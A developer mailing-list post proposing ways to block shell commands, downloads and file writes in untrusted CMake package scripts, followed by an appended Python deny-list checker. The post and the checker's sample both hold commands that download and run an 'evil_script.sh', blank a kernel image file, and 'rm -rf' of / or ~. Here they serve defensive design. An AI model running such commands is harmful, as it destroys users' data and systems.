Hi,

I'm working on a package manager based on cmake. And some cmake instructions are downloaded with user packages. I'd like to have an ability to deny some cmake features in such external untrusted insertions.

1. Disable any COMMAND invocations (in exec[ute]_command, add_custom_command, add_custom_target etc.)
2. Disable any external_project downloads etc.
3. Disable specific cmake commands (e.g. file(WRITE ...))
4. add more potentially insecure features here

Potential vulnerabilities are (according to previous list):

1. Invocation of 'rm -rf' command. The dir can be / in sudo or ~ in user mode.
2. Downloading of unwanted scripts. Also applicable to 1).
3. Rewriting important system files (like /boot/kernel.image..., /lib/libc... etc)

How it can be done?

1. Set a new policy?
2,3. Add new cmake command: enable_command(cmd, {On|Off})

Example:

    ...
    # trusted code above
    set_policy(disable COMMAND) # pseudo
    enable_command(file, Off)

    # untrusted ON
    execute_command(
        COMMAND wget http://.../evil_script.sh
        COMMAND ./evil_script.sh
    ) # will throw an error - COMMAND is denied
    file(WRITE /boot/vmlinuz-4.4.0-34-generic "") # will throw an error - file is banned
    # untrusted OFF

    enable_command(file, On)
    set_policy(enable COMMAND) # pseudo
    # trusted code below
    ...

What do you think? Is it possible in the latest CMake? Or can it be added in the future?

--
Egor Pugin
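As an added illustration of the screening such a policy would need (example code, not part of this post, of the package manager, or of CMake itself): a small Python checker that tokenizes an untrusted CMake fragment and flags the command classes listed above before the fragment is ever included. The deny lists, the policy names and the sample fragment are constructed assumptions, not real CMake policies.

```python
"""Static screen for untrusted CMake fragments (added example). It finds
"command(args)" invocations, skipping '#' comments and honouring
double-quoted arguments, and reports any invocation the policy denies."""
import re

# Commands denied outright (compared case-insensitively). Assumed policy.
DENY_COMMANDS = {"execute_process", "exec_program", "externalproject_add",
                 "fetchcontent_declare", "fetchcontent_makeavailable"}
# Commands denied only for particular sub-commands (first argument).
DENY_SUBCOMMANDS = {"file": {"WRITE", "APPEND", "DOWNLOAD", "REMOVE",
                             "REMOVE_RECURSE", "RENAME", "COPY"}}
# Commands denied when they carry a COMMAND keyword (shell invocation).
DENY_IF_COMMAND_KEYWORD = {"add_custom_command", "add_custom_target"}

def strip_comments(text):
    # Drop '#' line comments but keep '#' that sits inside a quoted argument.
    return re.sub(r'"(?:\\.|[^"\\])*"|#[^\n]*',
                  lambda m: m.group(0) if m.group(0).startswith('"') else "",
                  text)

def screen(text):
    """Return (line, command, reason) tuples for every denied invocation."""
    findings = []
    clean = strip_comments(text)  # newlines are kept, so line numbers hold
    for m in re.finditer(r'\b([A-Za-z_]\w*)\s*\(((?:"(?:\\.|[^"\\])*"|[^()"])*)\)', clean):
        name, args = m.group(1), m.group(2)
        line = clean.count("\n", 0, m.start()) + 1
        lname = name.lower()
        toks = [t.strip('"') for t in re.findall(r'"(?:\\.|[^"\\])*"|[^\s()]+', args)]
        if lname in DENY_COMMANDS:
            findings.append((line, name, "command is denied"))
        elif lname in DENY_SUBCOMMANDS and toks and toks[0].upper() in DENY_SUBCOMMANDS[lname]:
            findings.append((line, f"{name}({toks[0]})", "sub-command is denied"))
        elif lname in DENY_IF_COMMAND_KEYWORD and "COMMAND" in toks:
            findings.append((line, name, "COMMAND keyword is denied"))
    return findings

# Constructed sample of an untrusted package fragment (placeholder host/path).
UNTRUSTED_SNIPPET = """\
# constructed sample of an untrusted package fragment
set(PKG_NAME demo)  # harmless
execute_process(
    COMMAND wget http://example.invalid/evil_script.sh
    COMMAND ./evil_script.sh
)
file(WRITE /boot/vmlinuz-placeholder "")
file(READ config.txt CONTENTS)  # read-only, allowed
add_custom_target(run ALL COMMAND ./evil_script.sh)
message("# not a comment")
"""

if __name__ == "__main__":
    for line, cmd, reason in screen(UNTRUSTED_SNIPPET):
        print(f"line {line}: {cmd}: {reason}")
```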